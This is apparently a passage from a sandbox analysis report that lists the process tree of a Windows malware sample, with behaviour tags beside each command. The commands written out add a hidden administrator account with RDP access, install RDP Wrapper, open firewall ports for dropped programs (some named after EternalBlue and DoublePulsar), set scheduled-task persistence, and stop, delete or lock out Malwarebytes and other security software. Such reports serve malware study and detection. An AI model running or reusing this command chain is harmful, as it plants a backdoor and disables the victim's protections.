reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
10⤵
PID:5444

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5784

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
10⤵
PID:568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
11⤵
PID:5676

C:\Windows\SysWOW64\chcp.com
chcp 1251
10⤵
PID:3112

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
10⤵
PID:5500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
11⤵
- System Location Discovery: System Language Discovery
PID:912

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
10⤵
PID:5816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
11⤵
- System Location Discovery: System Language Discovery
PID:4628

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
10⤵
PID:5728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
11⤵
PID:5704

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
10⤵
PID:5532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
11⤵
PID:5872

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
- System Location Discovery: System Language Discovery
PID:5380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
11⤵
- System Location Discovery: System Language Discovery
PID:5992

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
10⤵
PID:6096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
11⤵
PID:4924

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:6036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
11⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5744

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
10⤵
- System Location Discovery: System Language Discovery
PID:6064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
11⤵
PID:5912

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:6020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
11⤵
PID:5168

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
PID:6040

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5860

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
10⤵
- Executes dropped EXE
PID:5792

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
10⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:4968

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
10⤵
PID:4336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
11⤵
PID:4560

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5928

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
10⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3892

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1324

C:\Windows\SysWOW64\timeout.exe
timeout 2
8⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3524

C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6128

C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5936

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C203.tmp\C204.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
7⤵
PID:5124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:6068

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:624

C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
7⤵
- System Location Discovery: System Language Discovery
PID:1612

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
8⤵
- System Location Discovery: System Language Discovery
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
6⤵
PID:6048

C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
7⤵
- Gathers network information
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
6⤵
PID:6100

C:\Windows\system32\gpupdate.exe
gpupdate /force
7⤵
PID:4044

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
5⤵
- Scheduled Task/Job: Scheduled Task
PID:5048

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
5⤵
- Drops file in Drivers directory
PID:1624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
5⤵
PID:5920

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
6⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3628

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
6⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5564

C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
6⤵
- Kills process with taskkill
PID:4376

C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5664

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5956

C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
3⤵
PID:2460

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
4⤵
- Launches sc.exe
PID:2792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
3⤵
PID:2792

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
4⤵
- Launches sc.exe
PID:5192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
3⤵
- System Location Discovery: System Language Discovery
PID:5288

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
4⤵
- Launches sc.exe
PID:5360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
3⤵
PID:5376

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
4⤵
- Launches sc.exe
PID:5432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
3⤵
PID:5448

C:\Windows\SysWOW64\sc.exe
sc delete swprv
4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
3⤵
- System Location Discovery: System Language Discovery
PID:5512

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
4⤵
- Launches sc.exe
PID:5556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
3⤵
PID:5568

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
3⤵
PID:5632

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
4⤵
- Launches sc.exe
PID:5684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
3⤵
PID:5700

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
4⤵
- Launches sc.exe
PID:5752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
3⤵
PID:5800

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
4⤵
- Launches sc.exe
PID:5852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
3⤵
- System Location Discovery: System Language Discovery
PID:5864

C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
4⤵
- Launches sc.exe
PID:5916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
3⤵
- System Location Discovery: System Language Discovery
PID:5932

C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
4⤵
- Launches sc.exe
PID:5976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
3⤵
PID:6016

C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
4⤵
- Launches sc.exe
PID:6112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
3⤵
PID:6024

C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
4⤵
- Launches sc.exe
PID:6104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
3⤵
PID:2756

C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
4⤵
- Launches sc.exe
PID:2476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
3⤵
PID:5132

C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
4⤵
- Launches sc.exe
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
3⤵
PID:5172

C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
3⤵
PID:5224

C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
3⤵
PID:1668

C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
4⤵
- Launches sc.exe
PID:1116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
3⤵
PID:3100

C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
4⤵
- Launches sc.exe
PID:5364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
3⤵
PID:5164

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
3⤵
PID:568

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:4912

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
3⤵
- System Location Discovery: System Language Discovery
PID:1180

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:1876

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:1092

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
3⤵
PID:5608

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
3⤵
PID:5720

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
3⤵
- System Location Discovery: System Language Discovery
PID:5768

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
3⤵
- System Location Discovery: System Language Discovery
PID:5808

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
3⤵
PID:5892

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
3⤵
PID:6112

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
3⤵
PID:6080

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
3⤵
PID:768

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
3⤵
PID:3396

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
3⤵
PID:4040

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
3⤵
PID:5212

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
3⤵
PID:5228

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
3⤵
PID:2528

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
3⤵
PID:116

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
3⤵
PID:2296

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
3⤵
PID:1960

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5540

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:5504

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:3464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
3⤵
PID:1584

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
- System Location Discovery: System Language Discovery
PID:4352

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
3⤵
PID:912

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
3⤵
PID:5512

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
3⤵
PID:5652

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
PID:5800

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
3⤵
PID:5876

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
PID:5744

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
3⤵
PID:5952

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:5284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
3⤵
PID:5892

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
3⤵
PID:5944

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
3⤵
PID:5964

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
3⤵
PID:5896

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
4⤵
- Modifies file permissions
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
PID:6024

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
3⤵
- System Location Discovery: System Language Discovery
PID:6092

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
4⤵
- Modifies file permissions
PID:3496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
3⤵
PID:3960

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2928

